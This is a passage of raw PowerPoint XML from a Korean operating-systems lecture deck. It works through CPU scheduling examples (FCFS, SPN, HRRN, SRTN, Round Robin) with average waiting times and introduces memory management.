                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이상이였으면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좋겠어</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프로세스 관리 기능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scheduling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4367952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FCFS</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(0+3+8+10)/4 = 5.25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>들어온 순서대로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a:t>SPN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(0+10+1+3)/4 = 3.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시간 에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번 프로세스가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>burst time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이 작음으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번보다 먼저 실행</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8" name="그림 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D051DF9-27D4-4141-BDB9-63B0E6B61591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="512244" y="704006"/>
            <a:ext cx="5411126" cy="5048560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="그림 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92E5082C-5A41-411F-AAE5-9FE08591C25C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6262413" y="704006"/>
            <a:ext cx="5385992" cy="5055687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="직선 연결선 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEBCBF7D-877F-4BB4-A0AB-331760D87802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7370496" y="1385575"/>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화살표: 아래쪽 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE46FBC1-E528-4BE9-B427-F2351F9AE2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318830" y="1074031"/>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7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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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HRRN</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Average Waiting Time = (0+3+10+5)/4 = 4.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시간 에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번은 비록 작업시간이 많지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>기다린 시간이 더 많음으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시간 에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Response Ratio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 더 높은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번 먼저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SRTN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Average Waiting Time = (0+10+3+0)/4 = 3.25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시간 에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, process 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번이 하던 중</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>그 시점 남은 시간이 더 짧은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>process 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>선점</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그림 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB55A2D3-D1F9-4352-AD42-2E5E4196AB73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="465921" y="679731"/>
            <a:ext cx="5428087" cy="5057522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="그림 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AFB6984-9575-47CD-8E9F-613C34E5215D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6270086" y="679731"/>
            <a:ext cx="5412436" cy="5057522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="직선 연결선 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96537722-8EA9-41F5-85BB-F1685D2F3410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552323"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화살표: 아래쪽 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD6007B7-DDD7-4AF2-86A9-1CB768F86527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500657"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0149DAAD-06AE-465B-AB36-93423C85CB8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7700921"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화살표: 아래쪽 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED28990-E27F-44D4-96A0-DF7719ADF148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7649255"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2842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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14"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0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="22" presetID="45"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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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RR  ,  Time Quantum = 2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(2+10+9+4)/4 = 6.25</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563529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RR  ,  Time Quantum = 3 </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(6+10+9+4)/4 = 7.25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6241B9A-FE83-4A38-9A52-0C07973E7327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="502362" y="687823"/>
            <a:ext cx="5437192" cy="5068337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B183B278-9391-4D4C-9D9E-731888AAD3ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6258825" y="687823"/>
            <a:ext cx="5465317" cy="5062753"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFCAA1B4-47EA-432F-95E9-6C6592BD412D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="6004289"/>
            <a:ext cx="5616792" cy="495793"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>: SRTN (Shortest Remain Time Next)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>하지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>현재 사용하고 있는 스케줄러는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, RR (Round Robin) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 가깝다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>왜그럴까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50233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5213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 name="그룹 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C4FA50-B277-4185-A4A2-0DE6850AF59E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="460842" y="1790640"/>
            <a:ext cx="6343650" cy="4667250"/>
            <a:chOff x="709321" y="1825625"/>
            <a:chExt cx="6343650" cy="4667250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5122" name="Picture 2" descr="Memory Management in OS: Contiguous, Swapping, Fragmentation">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD5563F5-9EC5-406E-8321-7E433E5EE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25625"/>
              <a:ext cx="6343650" cy="466725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310D8D8C-D0C9-467D-A732-C9A854D67DED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2713383" y="5426765"/>
              <a:ext cx="1520687" cy="516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0B499C39-6783-4611-926E-3DB8E5AA29A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924460" y="2694972"/>
            <a:ext cx="4549308" cy="1700787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>적은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오버헤드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>성능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 최대한 이끌어 낼 수 있도록</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>프로세스들 사이에서 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 자원을 적절히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>할당하는것</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="직사각형 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67E0112B-D5FA-4292-BC99-17BAA60F0397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252330" y="3276729"/>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P1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="직사각형 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{360435E0-3304-4A92-BB51-A01EC0DD3E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252330" y="4330034"/>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P3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="직사각형 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65F59B32-A37E-4CC2-8502-BDA6FBA59D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252329" y="5198052"/>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P5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
